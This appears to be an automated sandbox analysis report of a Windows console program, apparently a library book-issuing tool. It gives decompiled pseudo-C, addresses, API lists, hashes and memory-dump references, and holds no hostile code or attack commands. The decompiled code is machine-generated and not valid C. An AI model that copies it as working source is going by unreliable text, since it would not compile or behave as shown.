                                                  C-Code - Quality: 52%
                                                  			E00B17A40(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t16;

				_push("cls");
				E00AE3965(_t11, __edx, _t14, _t16);
				0xb27e6c->X = 0x8000a;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t12, "The Book has taken by Mr. %s", 0xb27ec4);
				0xb27e6c->X = 0x9000a;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				_push( *0xb27f1c);
				_push( *0xb27f14);
				E00AD1080(_t12, "Issued Date:%d-%d-%d",  *0xb27f18);
				0xb27e6c->X = 0xa000a;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
				_push( *0xb27f28);
				_push( *0xb27f20);
				return E00AD1080(_t12, "Returning Date:%d-%d-%d",  *0xb27f24);
			}










                                                  0x00b17a43
                                                  0x00b17a48
                                                  0x00b17a56
                                                  0x00b17a71
                                                  0x00b17a7d
                                                  0x00b17a85
                                                  0x00b17a9a
                                                  0x00b17a9c
                                                  0x00b17aa2
                                                  0x00b17ab3
                                                  0x00b17abb
                                                  0x00b17ad0
                                                  0x00b17ad2
                                                  0x00b17ad8
                                                  0x00b17af4

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17A68
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A71
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17A97
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A9A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17ACD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17AD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition
                                                  • String ID: Issued Date:%d-%d-%d$Returning Date:%d-%d-%d$The Book has taken by Mr. %s$cls
                                                  • API String ID: 4283984680-2668252268
                                                  • Opcode ID: a88f10b91b334bd022ce5a917a3a4ad3b98dc374bf0f7bd3bab4e1b4169ac80c
                                                  • Instruction ID: 134c7d23e65eb25f9df790fbacddc9c3dc24c4e382c5d35acf17155643cc5a1d
                                                  • Opcode Fuzzy Hash: a88f10b91b334bd022ce5a917a3a4ad3b98dc374bf0f7bd3bab4e1b4169ac80c
                                                  • Instruction Fuzzy Hash: 5601D4B398C1907ACB317BD6FD09D863E69EB4D7247054181F128032B1CEB15422DF75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFC483, Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00AFC483(void* __edx, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0xb1ce30;
				if(_t67 != 0xb1ce30) {
					L00AF4D62(_t67);
					_t36 = _a4;
				}
				L00AF4D62( *((intOrPtr*)(_t36 + 0x3c)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x30)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x34)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x38)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x28)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x2c)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x40)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x44)));
				L00AF4D62( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00AFC1AB(_t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00AFC20C(_t71, _t72, _t76);
			}













                                                  0x00afc483
                                                  0x00afc483
                                                  0x00afc488
                                                  0x00afc48e
                                                  0x00afc490
                                                  0x00afc496
                                                  0x00afc499
                                                  0x00afc49e
                                                  0x00afc4a1
                                                  0x00afc4a5
                                                  0x00afc4b0
                                                  0x00afc4bb
                                                  0x00afc4c6
                                                  0x00afc4d1
                                                  0x00afc4dc
                                                  0x00afc4e7
                                                  0x00afc4f2
                                                  0x00afc500
                                                  0x00afc50b
                                                  0x00afc513
                                                  0x00afc514
                                                  0x00afc517
                                                  0x00afc51d
                                                  0x00afc521
                                                  0x00afc525
                                                  0x00afc526
                                                  0x00afc530
                                                  0x00afc536
                                                  0x00afc537
                                                  0x00afc53a
                                                  0x00afc540
                                                  0x00afc544
                                                  0x00afc548
                                                  0x00afc551

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: ca4dd42af2d3cbc6a8bba9c04723d8a46d06bfc4913c422eeca9421cc01ae2cd
                                                  • Instruction ID: 767269be5e68962d9105abf87253dc3938006037e8fd357576ba814465cf29fe
                                                  • Opcode Fuzzy Hash: ca4dd42af2d3cbc6a8bba9c04723d8a46d06bfc4913c422eeca9421cc01ae2cd
                                                  • Instruction Fuzzy Hash: 7021747690010CEFDF51EFD5C981DEE7BB9BF48750F0081A6B6199B121EB35EA548B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B014C0, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 416COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00B014C0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int* _a8) {
				signed int _v0;
				intOrPtr _v4;
				signed int _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				short _v18;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr* _v112;
				intOrPtr* _v160;
				intOrPtr* _v200;
				intOrPtr _v232;
				intOrPtr* _v236;
				CHAR* _v240;
				signed int _v252;
				intOrPtr _v298;
				intOrPtr _v299;
				struct _WIN32_FIND_DATAA _v344;
				union _FINDEX_INFO_LEVELS _v348;
				signed int _v352;
				signed int _v356;
				intOrPtr _v576;
				intOrPtr* _t186;
				signed int _t188;
				signed int _t193;
				void* _t194;
				signed int _t204;
				intOrPtr _t206;
				char _t207;
				void* _t211;
				signed int _t213;
				intOrPtr* _t215;
				signed int _t217;
				signed int _t222;
				signed int _t223;
				intOrPtr* _t234;
				intOrPtr _t236;
				signed int _t237;
				void* _t240;
				intOrPtr _t242;
				void* _t247;
				intOrPtr _t249;
				void* _t254;
				signed int _t257;
				intOrPtr _t259;
				signed char _t260;
				union _FINDEX_INFO_LEVELS _t268;
				int _t273;
				void* _t285;
				void* _t287;
				signed int _t288;
				signed int _t291;
				void* _t293;
				signed int _t294;
				signed int _t295;
				intOrPtr _t297;
				short _t302;
				short _t303;
				void* _t306;
				signed int _t307;
				signed int* _t308;
				char _t310;
				void* _t311;
				intOrPtr _t313;
				signed int _t319;
				signed int* _t320;
				signed int _t323;
				signed int _t325;
				signed int _t327;
				void* _t329;
				void* _t332;
				intOrPtr _t333;
				union _FINDEX_INFO_LEVELS _t334;
				void* _t337;
				signed int* _t339;
				signed int _t341;
				signed int _t343;
				signed int _t345;
				intOrPtr _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr* _t358;
				signed int _t363;
				intOrPtr* _t364;
				signed int _t366;
				void* _t368;
				intOrPtr* _t369;
				char _t372;
				void* _t374;
				intOrPtr* _t375;
				intOrPtr _t383;
				intOrPtr* _t395;
				signed int _t399;
				intOrPtr* _t400;
				intOrPtr* _t408;
				signed int _t413;
				void* _t414;
				void* _t415;
				intOrPtr _t416;
				signed int _t418;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed int _t428;
				signed int _t430;
				CHAR* _t431;
				signed int _t433;
				signed int _t438;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t444;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				intOrPtr* _t451;
				void* _t452;
				intOrPtr _t453;
				void* _t454;
				signed int _t457;
				signed int _t460;
				void* _t461;
				void* _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				signed int _t470;
				void* _t471;
				void* _t472;

				_t186 = _a8;
				_t465 = _t464 - 0x28;
				_push(__esi);
				if(_t186 != 0) {
					_t438 = _a4;
					_push(__ebx);
					_t323 = 0;
					_push(__edi);
					 *_t186 = 0;
					_t423 = 0;
					_t341 = 0;
					_v44 = 0;
					_v344.cAlternateFileName = 0;
					_v36 = 0;
					if( *_t438 == 0) {
						L9:
						_v12 = _t323;
						_t188 = _t341 - _t423;
						_v8 = _t423;
						_t405 = (_t188 >> 2) + 1;
						_v16 = (_t188 >> 2) + 1;
						asm("sbb esi, esi");
						_t440 =  !_t438 & _t188 + 0x00000003 >> 0x00000002;
						if(_t440 != 0) {
							_t311 = _t423;
							_t421 = _t323;
							do {
								_t400 =  *_t311;
								_t17 = _t400 + 1; // 0x1
								_v20 = _t17;
								do {
									_t313 =  *_t400;
									_t400 = _t400 + 1;
								} while (_t313 != 0);
								_v12 = _v12 + 1 + _t400 - _v20;
								_t311 = _v8 + 4;
								_t421 = _t421 + 1;
								_v8 = _t311;
							} while (_t421 != _t440);
							_t405 = _v16;
						}
						_t441 = E00AF2005(_t405, _v12, 1);
						_t466 = _t465 + 0xc;
						if(_t441 != 0) {
							_v8 = _t423;
							_t193 = _t441 + _v16 * 4;
							_t342 = _t193;
							_v28 = _t193;
							_t194 = _t423;
							_v16 = _t193;
							if(_t423 == _v344.cAlternateFileName) {
								L24:
								_v12 = _t323;
								 *_a8 = _t441;
								_t442 = _t323;
								goto L25;
							} else {
								_v32 = _t441 - _t423;
								do {
									_t204 =  *_t194;
									_t408 = _t204;
									_v24 = _t204;
									_v20 = _t408 + 1;
									do {
										_t206 =  *_t408;
										_t408 = _t408 + 1;
									} while (_t206 != 0);
									_t207 = _t408 - _v20 + 1;
									_push(_t207);
									_v20 = _t207;
									_t211 = E00B0F425(_t342, _t342, _v28 - _t342 + _v12, _v24);
									_t466 = _t466 + 0x10;
									if(_t211 != 0) {
										_push(_t323);
										_push(_t323);
										_push(_t323);
										_push(_t323);
										_push(_t323);
										E00AF68E9();
										asm("int3");
										_t460 = _t466;
										_t467 = _t466 - 0x34;
										_t213 =  *0xb26018; // 0xb47fd95f
										_v84 = _t213 ^ _t460;
										_t215 = _v68;
										_v112 = _t215;
										_push(_t441);
										_t445 = _v72;
										if(_t215 != 0) {
											_push(_t323);
											_push(_t423);
											_t426 = 0;
											 *_t215 = 0;
											_t325 = 0;
											_t348 = 0;
											_v52 = 0;
											_v48 = 0;
											_v44 = 0;
											if( *_t445 == 0) {
												L42:
												_v24 = _t426;
												_t217 = _t348 - _t325;
												_v28 = _t325;
												_t412 = (_t217 >> 2) + 1;
												_v32 = (_t217 >> 2) + 1;
												asm("sbb esi, esi");
												_t447 =  !_t445 & _t217 + 0x00000003 >> 0x00000002;
												if(_t447 != 0) {
													_t295 = _t325;
													_t419 = _t426;
													do {
														_t395 =  *_t295;
														_t83 = _t395 + 2; // 0x2
														_v36 = _t83;
														do {
															_t297 =  *_t395;
															_t395 = _t395 + 2;
														} while (_t297 != _t426);
														_v24 = _v24 + 1 + (_t395 - _v36 >> 1);
														_t295 = _v28 + 4;
														_t419 = _t419 + 1;
														_v28 = _t295;
													} while (_t419 != _t447);
													_t412 = _v32;
												}
												_t448 = E00AF2005(_t412, _v24, 2);
												_t468 = _t467 + 0xc;
												if(_t448 != 0) {
													_v28 = _t325;
													_t222 = _t448 + _v32 * 4;
													_t413 = _t222;
													_v60 = _t222;
													_t223 = _t325;
													_v32 = _t413;
													if(_t325 == _v48) {
														L57:
														_v24 = _t426;
														 *(_v344.cAlternateFileName) = _t448;
														_t449 = _t426;
														goto L58;
													} else {
														_v20 = _t448 - _t325;
														do {
															_t234 =  *_t223;
															_t358 = _t234;
															_v56 = _t234;
															_v36 = _t358 + 2;
															do {
																_t236 =  *_t358;
																_t358 = _t358 + 2;
															} while (_t236 != _t426);
															_t237 = (_t358 - _v36 >> 1) + 1;
															_push(_t237);
															_v36 = _t237;
															_t363 = _t413 - _v60 >> 1;
															_t240 = E00B0132B(_t363, _t413, _v24 - _t363, _v56);
															_t468 = _t468 + 0x10;
															if(_t240 != 0) {
																_push(_t426);
																_push(_t426);
																_push(_t426);
																_push(_t426);
																_push(_t426);
																E00AF68E9();
																asm("int3");
																_push(_t460);
																_t461 = _t468;
																_push(_t363);
																_t364 = _v160;
																_t134 = _t364 + 1; // 0x1
																_t414 = _t134;
																do {
																	_t242 =  *_t364;
																	_t364 = _t364 + 1;
																} while (_t242 != 0);
																_push(_t426);
																_t428 = _a4;
																_t366 = _t364 - _t414 + 1;
																_v16 = _t366;
																if(_t366 <=  !_t428) {
																	_push(_t325);
																	_t137 = _t428 + 1; // 0x1
																	_t329 = _t137 + _t366;
																	_t452 = E00AF4F03(_t366, _t329, 1);
																	_t368 = _t448;
																	if(_t428 == 0) {
																		L72:
																		_push(_v16);
																		_t329 = _t329 - _t428;
																		_t247 = E00B0F425(_t368, _t452 + _t428, _t329, _v4);
																		_t469 = _t468 + 0x10;
																		if(_t247 != 0) {
																			goto L78;
																		} else {
																			_t339 = _a8;
																			_t288 = L00B01F26(_t339, _t414);
																			_v16 = _t288;
																			if(_t288 == 0) {
																				 *(_t339[1]) = _t452;
																				_t457 = 0;
																				_t339[1] = _t339[1] + 4;
																			} else {
																				L00AF4D62(_t452);
																				_t457 = _v16;
																			}
																			L00AF4D62(0);
																			_t291 = _t457;
																			goto L77;
																		}
																	} else {
																		_push(_t428);
																		_t293 = E00B0F425(_t368, _t452, _t329, _v0);
																		_t469 = _t468 + 0x10;
																		if(_t293 != 0) {
																			L78:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E00AF68E9();
																			asm("int3");
																			_push(_t461);
																			_t462 = _t469;
																			_push(_t368);
																			_t369 = _v200;
																			_push(_t329);
																			_push(0);
																			_t149 = _t369 + 2; // 0x2
																			_t415 = _t149;
																			do {
																				_t249 =  *_t369;
																				_t369 = _t369 + 2;
																			} while (_t249 != 0);
																			_t430 = _v0;
																			_t372 = (_t369 - _t415 >> 1) + 1;
																			_v20 = _t372;
																			if(_t372 <=  !_t430) {
																				_t152 = _t430 + 1; // 0x1
																				_t332 = _t152 + _t372;
																				_t453 = E00AF4F03(_t372, _t332, 2);
																				_t374 = _t452;
																				if(_t430 == 0) {
																					L85:
																					_push(_v20);
																					_t332 = _t332 - _t430;
																					_t254 = E00B0132B(_t374, _t453 + _t430 * 2, _t332, _v8);
																					_t470 = _t469 + 0x10;
																					if(_t254 != 0) {
																						goto L91;
																					} else {
																						_t433 = _a4;
																						_t337 = L00B01F26(_t433, _t415);
																						if(_t337 == 0) {
																							 *((intOrPtr*)( *((intOrPtr*)(_t433 + 4)))) = _t453;
																							 *((intOrPtr*)(_t433 + 4)) =  *((intOrPtr*)(_t433 + 4)) + 4;
																							_t337 = 0;
																						} else {
																							L00AF4D62(_t453);
																						}
																						L00AF4D62(0);
																						_t285 = _t337;
																						goto L90;
																					}
																				} else {
																					_push(_t430);
																					_t287 = E00B0132B(_t374, _t453, _t332, _v4);
																					_t470 = _t469 + 0x10;
																					if(_t287 != 0) {
																						L91:
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						E00AF68E9();
																						asm("int3");
																						_push(_t462);
																						_t463 = _t470;
																						_t471 = _t470 - 0x150;
																						_t257 =  *0xb26018; // 0xb47fd95f
																						_v252 = _t257 ^ _t470;
																						_t375 = _v236;
																						_push(_t332);
																						_t333 = _v232;
																						_push(_t430);
																						_t431 = _v240;
																						_v576 = _t333;
																						while(_t375 != _t431) {
																							_t259 =  *_t375;
																							if(_t259 != 0x2f && _t259 != 0x5c && _t259 != 0x3a) {
																								_t375 = E00B0F470(_t431, _t375);
																								continue;
																							}
																							break;
																						}
																						_t416 =  *_t375;
																						if(_t416 != 0x3a || _t375 ==  &(_t431[1])) {
																							_t334 = 0;
																							if(_t416 == 0x2f || _t416 == 0x5c) {
																								L104:
																								_t260 = 1;
																							} else {
																								_t260 = 0;
																								if(_t416 == 0x3a) {
																									goto L104;
																								}
																							}
																							_push(_t453);
																							asm("sbb eax, eax");
																							_v352 =  ~(_t260 & 0x000000ff) & _t375 - _t431 + 0x00000001;
																							E00AD24C0(_t431,  &_v344, _t334, 0x140);
																							_t472 = _t471 + 0xc;
																							_t454 = FindFirstFileExA(_t431, _t334,  &_v344, _t334, _t334, _t334);
																							_t268 = _v348;
																							if(_t454 != 0xffffffff) {
																								_v356 =  *((intOrPtr*)(_t268 + 4)) -  *_t268 >> 2;
																								do {
																									if(_v344.cFileName != 0x2e) {
																										L117:
																										_push(_t268);
																										_push(_v352);
																										_t268 =  &(_v344.cFileName);
																										_push(_t431);
																										_push(_t268);
																										L66();
																										_t472 = _t472 + 0x10;
																										if(_t268 != 0) {
																											goto L107;
																										} else {
																											goto L118;
																										}
																									} else {
																										_t383 = _v299;
																										if(_t383 == 0 || _t383 == 0x2e && _v298 == _t334) {
																											goto L118;
																										} else {
																											goto L117;
																										}
																									}
																									goto L111;
																									L118:
																									_t273 = FindNextFileA(_t454,  &_v344);
																									_t268 = _v348;
																								} while (_t273 != 0);
																								_t417 =  *_t268;
																								_t384 = _v356;
																								_t276 =  *((intOrPtr*)(_t268 + 4)) -  *_t268 >> 2;
																								if(_v356 !=  *((intOrPtr*)(_t268 + 4)) -  *_t268 >> 2) {
																									L00B0EF30(_t334, _t431, _t454, _t417 + _t384 * 4, _t276 - _t384, 4, E00B014A8);
																								}
																							} else {
																								_push(_t268);
																								_push(_t334);
																								_push(_t334);
																								_push(_t431);
																								L66();
																								L107:
																								_t334 = _t268;
																							}
																							if(_t454 != 0xffffffff) {
																								FindClose(_t454);
																							}
																						} else {
																							_push(_t333);
																							_push(0);
																							_push(0);
																							_push(_t431);
																							L66();
																						}
																						L111:
																						return L00AD1DCD(_v24 ^ _t463);
																					} else {
																						goto L85;
																					}
																				}
																			} else {
																				_t285 = 0xc;
																				L90:
																				return _t285;
																			}
																		} else {
																			goto L72;
																		}
																	}
																} else {
																	_t291 = 0xc;
																	L77:
																	return _t291;
																}
															} else {
																goto L56;
															}
															goto L121;
															L56:
															_t294 = _v28;
															_t418 = _v32;
															 *((intOrPtr*)(_v20 + _t294)) = _t418;
															_t223 = _t294 + 4;
															_v28 = _t223;
															_t413 = _t418 + _v36 * 2;
															_v32 = _t413;
														} while (_t223 != _v48);
														goto L57;
													}
												} else {
													_t449 = _t448 | 0xffffffff;
													_v24 = _t448 | 0xffffffff;
													L58:
													L00AF4D62(_t426);
													_pop(_t349);
													goto L59;
												}
											} else {
												while(1) {
													_t302 = 0x2a;
													_v20 = _t302;
													_t303 = 0x3f;
													_v18 = _t303;
													_v16 = 0;
													_t306 = E00B04ACB( *_t445,  &_v20);
													_pop(_t349);
													if(_t306 != 0) {
														_t349 =  &_v52;
														_t307 = E00B01BA6(_t325, _t426, _t445,  *_t445, _t306, _t349);
														_t467 = _t467 + 0xc;
													} else {
														_t307 =  &_v52;
														_push(_t307);
														_push(_t426);
														_push(_t426);
														_push( *_t445);
														L79();
														_t467 = _t467 + 0x10;
													}
													_v24 = _t307;
													if(_t307 != 0) {
														break;
													}
													_t445 = _t445 + 4;
													if( *_t445 != _t426) {
														continue;
													} else {
														_t325 = _v52;
														_t348 = _v48;
														goto L42;
													}
													goto L121;
												}
												_t325 = _v52;
												_t449 = _v24;
												L59:
												_v20 = _t325;
												asm("sbb ecx, ecx");
												_t351 =  !_t349 & _v48 - _t325 + 0x00000003 >> 0x00000002;
												_v344.cAlternateFileName = _t351;
												if(_t351 != 0) {
													_t451 = _v20;
													_t327 = _t351;
													do {
														L00AF4D62( *_t451);
														_t426 = _t426 + 1;
														_t451 = _t451 + 4;
													} while (_t426 != _t327);
													_t325 = _v52;
													_t449 = _v24;
												}
												L00AF4D62(_t325);
												goto L64;
											}
										} else {
											_t308 = E00AF69E3();
											_t449 = 0x16;
											 *_t308 = _t449;
											E00AF68BC();
											L64:
											return L00AD1DCD(_v12 ^ _t460);
										}
									} else {
										goto L23;
									}
									goto L121;
									L23:
									_t310 = _v8;
									_t399 = _v16;
									 *((intOrPtr*)(_v32 + _t310)) = _t399;
									_t194 = _t310 + 4;
									_t342 = _t399 + _v20;
									_v16 = _t399 + _v20;
									_v8 = _t194;
								} while (_t194 != _v344.cAlternateFileName);
								goto L24;
							}
						} else {
							_t442 = _t441 | 0xffffffff;
							_v12 = _t442;
							L25:
							L00AF4D62(_t323);
							_pop(_t343);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t323;
							_t319 = E00B0F430( *_t438,  &_v8);
							_pop(_t343);
							if(_t319 != 0) {
								_t343 =  &_v44;
								_push(_t343);
								_push(_t319);
								_push( *_t438);
								L92();
								_t465 = _t465 + 0xc;
							} else {
								_t319 =  &_v44;
								_push(_t319);
								_push(_t323);
								_push(_t323);
								_push( *_t438);
								L66();
								_t465 = _t465 + 0x10;
							}
							_v12 = _t319;
							if(_t319 != 0) {
								break;
							}
							_t438 = _t438 + 4;
							if( *_t438 != _t323) {
								continue;
							} else {
								_t423 = _v44;
								_t341 = _v344.cAlternateFileName;
								goto L9;
							}
							goto L121;
						}
						_t423 = _v44;
						_t442 = _v12;
						L26:
						_v28 = _t423;
						asm("sbb ecx, ecx");
						_t345 =  !_t343 & _v344.cAlternateFileName - _t423 + 0x00000003 >> 0x00000002;
						_v32 = _t345;
						if(_t345 != 0) {
							_t444 = _v28;
							_t425 = _t345;
							do {
								L00AF4D62( *_t444);
								_t323 = _t323 + 1;
								_t444 = _t444 + 4;
							} while (_t323 != _t425);
							_t423 = _v44;
							_t442 = _v12;
						}
						L00AF4D62(_t423);
						goto L31;
					}
				} else {
					_t320 = E00AF69E3();
					_t442 = 0x16;
					 *_t320 = _t442;
					E00AF68BC();
					L31:
					return _t442;
				}
				L121:
			}





















































































































































                                                  0x00b014c5
                                                  0x00b014c8
                                                  0x00b014cb
                                                  0x00b014ce
                                                  0x00b014e4
                                                  0x00b014e7
                                                  0x00b014e8
                                                  0x00b014ea
                                                  0x00b014eb
                                                  0x00b014ed
                                                  0x00b014ef
                                                  0x00b014f1
                                                  0x00b014f4
                                                  0x00b014f7
                                                  0x00b014fc
                                                  0x00b0154d
                                                  0x00b0154f
                                                  0x00b01552
                                                  0x00b01554
                                                  0x00b0155f
                                                  0x00b01565
                                                  0x00b01568
                                                  0x00b0156c
                                                  0x00b0156e
                                                  0x00b01570
                                                  0x00b01572
                                                  0x00b01574
                                                  0x00b01574
                                                  0x00b01576
                                                  0x00b01579
                                                  0x00b0157c
                                                  0x00b0157c
                                                  0x00b0157e
                                                  0x00b0157f
                                                  0x00b0158c
                                                  0x00b01592
                                                  0x00b01595
                                                  0x00b01596
                                                  0x00b01599
                                                  0x00b0159d
                                                  0x00b0159d
                                                  0x00b015ab
                                                  0x00b015ad
                                                  0x00b015b2
                                                  0x00b015cd
                                                  0x00b015d0
                                                  0x00b015d3
                                                  0x00b015d5
                                                  0x00b015d8
                                                  0x00b015da
                                                  0x00b015e0
                                                  0x00b0163d
                                                  0x00b01640
                                                  0x00b01643
                                                  0x00b01645
                                                  0x00000000
                                                  0x00b015e2
                                                  0x00b015e6
                                                  0x00b015e9
                                                  0x00b015e9
                                                  0x00b015eb
                                                  0x00b015ed
                                                  0x00b015f3
                                                  0x00b015f6
                                                  0x00b015f6
                                                  0x00b015f8
                                                  0x00b015f9
                                                  0x00b01600
                                                  0x00b01603
                                                  0x00b01607
                                                  0x00b01614
                                                  0x00b01619
                                                  0x00b0161e
                                                  0x00b01695
                                                  0x00b01696
                                                  0x00b01697
                                                  0x00b01698
                                                  0x00b01699
                                                  0x00b0169a
                                                  0x00b0169f
                                                  0x00b016a3
                                                  0x00b016a5
                                                  0x00b016a8
                                                  0x00b016af
                                                  0x00b016b2
                                                  0x00b016b5
                                                  0x00b016b8
                                                  0x00b016b9
                                                  0x00b016be
                                                  0x00b016d4
                                                  0x00b016d5
                                                  0x00b016d6
                                                  0x00b016d8
                                                  0x00b016da
                                                  0x00b016dc
                                                  0x00b016de
                                                  0x00b016e1
                                                  0x00b016e4
                                                  0x00b016e9
                                                  0x00b01749
                                                  0x00b0174b
                                                  0x00b0174e
                                                  0x00b01750
                                                  0x00b0175b
                                                  0x00b01761
                                                  0x00b01764
                                                  0x00b01768
                                                  0x00b0176a
                                                  0x00b0176c
                                                  0x00b0176e
                                                  0x00b01770
                                                  0x00b01770
                                                  0x00b01772
                                                  0x00b01775
                                                  0x00b01778
                                                  0x00b01778
                                                  0x00b0177b
                                                  0x00b0177e
                                                  0x00b0178e
                                                  0x00b01794
                                                  0x00b01797
                                                  0x00b01798
                                                  0x00b0179b
                                                  0x00b0179f
                                                  0x00b0179f
                                                  0x00b017ad
                                                  0x00b017af
                                                  0x00b017b4
                                                  0x00b017cf
                                                  0x00b017d2
                                                  0x00b017d5
                                                  0x00b017d7
                                                  0x00b017da
                                                  0x00b017dc
                                                  0x00b017e2
                                                  0x00b01850
                                                  0x00b01853
                                                  0x00b01856
                                                  0x00b01858
                                                  0x00000000
                                                  0x00b017e4
                                                  0x00b017e8
                                                  0x00b017eb
                                                  0x00b017eb
                                                  0x00b017ed
                                                  0x00b017ef
                                                  0x00b017f5
                                                  0x00b017f8
                                                  0x00b017f8
                                                  0x00b017fb
                                                  0x00b017fe
                                                  0x00b01808
                                                  0x00b01810
                                                  0x00b01814
                                                  0x00b0181a
                                                  0x00b01820
                                                  0x00b01825
                                                  0x00b0182a
                                                  0x00b018b2
                                                  0x00b018b3
                                                  0x00b018b4
                                                  0x00b018b5
                                                  0x00b018b6
                                                  0x00b018b7
                                                  0x00b018bc
                                                  0x00b018bf
                                                  0x00b018c0
                                                  0x00b018c2
                                                  0x00b018c3
                                                  0x00b018c6
                                                  0x00b018c6
                                                  0x00b018c9
                                                  0x00b018c9
                                                  0x00b018cb
                                                  0x00b018cc
                                                  0x00b018d0
                                                  0x00b018d1
                                                  0x00b018d8
                                                  0x00b018db
                                                  0x00b018e0
                                                  0x00b018e7
                                                  0x00b018e9
                                                  0x00b018ec
                                                  0x00b018f6
                                                  0x00b018f9
                                                  0x00b018fc
                                                  0x00b01910
                                                  0x00b01910
                                                  0x00b01913
                                                  0x00b0191d
                                                  0x00b01922
                                                  0x00b01927
                                                  0x00000000
                                                  0x00b01929
                                                  0x00b01929
                                                  0x00b0192e
                                                  0x00b01935
                                                  0x00b0193a
                                                  0x00b0194b
                                                  0x00b0194d
                                                  0x00b0194f
                                                  0x00b0193c
                                                  0x00b0193d
                                                  0x00b01942
                                                  0x00b01945
                                                  0x00b01954
                                                  0x00b0195a
                                                  0x00000000
                                                  0x00b0195d
                                                  0x00b018fe
                                                  0x00b018fe
                                                  0x00b01904
                                                  0x00b01909
                                                  0x00b0190e
                                                  0x00b01963
                                                  0x00b01965
                                                  0x00b01966
                                                  0x00b01967
                                                  0x00b01968
                                                  0x00b01969
                                                  0x00b0196a
                                                  0x00b0196f
                                                  0x00b01972
                                                  0x00b01973
                                                  0x00b01975
                                                  0x00b01976
                                                  0x00b01979
                                                  0x00b0197a
                                                  0x00b0197d
                                                  0x00b0197d
                                                  0x00b01980
                                                  0x00b01980
                                                  0x00b01983
                                                  0x00b01986
                                                  0x00b0198b
                                                  0x00b01994
                                                  0x00b01997
                                                  0x00b0199c
                                                  0x00b019a4
                                                  0x00b019a7
                                                  0x00b019b1
                                                  0x00b019b4
                                                  0x00b019b7
                                                  0x00b019cb
                                                  0x00b019cb
                                                  0x00b019ce
                                                  0x00b019d8
                                                  0x00b019dd
                                                  0x00b019e2
                                                  0x00000000
                                                  0x00b019e4
                                                  0x00b019e4
                                                  0x00b019ee
                                                  0x00b019f2
                                                  0x00b01a00
                                                  0x00b01a02
                                                  0x00b01a06
                                                  0x00b019f4
                                                  0x00b019f5
                                                  0x00b019fa
                                                  0x00b01a0a
                                                  0x00b01a10
                                                  0x00000000
                                                  0x00b01a12
                                                  0x00b019b9
